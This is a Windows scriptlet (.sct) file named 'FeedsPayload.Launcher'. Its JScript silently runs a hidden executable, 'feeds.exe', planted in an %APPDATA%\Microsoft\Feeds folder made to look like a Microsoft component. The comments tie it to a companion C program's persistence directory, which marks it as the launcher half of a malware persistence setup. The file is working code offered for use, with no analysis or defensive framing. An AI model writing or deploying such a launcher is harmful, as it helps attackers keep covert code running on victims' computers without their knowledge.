<?xml version="1.0"?>
<scriptlet>
  <registration
      progid="FeedsPayload.Launcher" <!-- You can change this -->
      classid="{3041efca-5fb4-4f53-b9f6-8ccc8aef6711}" <!-- IMPORTANT: Generate a NEW, UNIQUE GUID for this scriptlet's own registration -->
      remotable="true">
    <script language="JScript">
      <![CDATA[
        // This object is mainly for registration purposes. The main logic is below.
      ]]>
    </script>
  </registration>

  <script language="JScript">
    <![CDATA[
      // --- CONFIGURATION ---
      // This should match what's in your C code's PERSIST_DIR_NAME and PERSIST_EXE_NAME,
      // relative to %APPDATA%.
      var relativeDirPathFromAppData = "\\Microsoft\\Feeds"; 
      var executableNameInDir  = "feeds.exe";
      var logFileName = "sct_feeds_launcher.log"; // Log file for this SCT script

      function writeToLog(message) {
        try {
          var fso = new ActiveXObject("Scripting.FileSystemObject");
          var shell = new ActiveXObject("WScript.Shell");
          var appDataPath = shell.ExpandEnvironmentStrings("%APPDATA%");
          var logDir = appDataPath + relativeDirPathFromAppData;
          var logFilePath = logDir + "\\" + logFileName;

          if (!fso.FolderExists(logDir)) {
            // The C code should have created this. If not, best effort.
            try { fso.CreateFolder(logDir); } catch (e) { /* ignore */ }
          }
          
          var ts = fso.OpenTextFile(logFilePath, 8, true); // 8 = Append, true = Create if not exists
          var now = new Date();
          ts.WriteLine("[" + now.toUTCString() + "] " + message);
          ts.Close();
        } catch (e) {
          // Cannot write log.
        }
      }

      try {
        writeToLog("SCT Feeds Launcher: Scriptlet starting.");
        
        var oShell = new ActiveXObject("WScript.Shell");
        var sAppData = oShell.ExpandEnvironmentStrings("%APPDATA%");
        var sFullExePath = sAppData + relativeDirPathFromAppData + "\\" + executableNameInDir;
        
        writeToLog("SCT Feeds Launcher: Target EXE path: " + sFullExePath);

        var oFSO = new ActiveXObject("Scripting.FileSystemObject");
        if (oFSO.FileExists(sFullExePath)) {
          writeToLog("SCT Feeds Launcher: Executable found. Attempting to run...");
          oShell.Run('"' + sFullExePath + '"', 0, false); // 0 = hide window, false = do not wait
          writeToLog("SCT Feeds Launcher: shell.Run command issued for: " + sFullExePath);
        } else {
          writeToLog("SCT Feeds Launcher: ERROR - Executable NOT FOUND at: " + sFullExePath);
        }
      } catch (err) {
        var errorDescription = "Unknown error";
        if (err.description && err.description !== "") {
          errorDescription = err.description;
        } else if (err.message && err.message !== "") {
          errorDescription = err.message;
        }
        writeToLog("SCT Feeds Launcher: EXCEPTION - " + errorDescription);
      }
    ]]>
  </script>
</scriptlet>
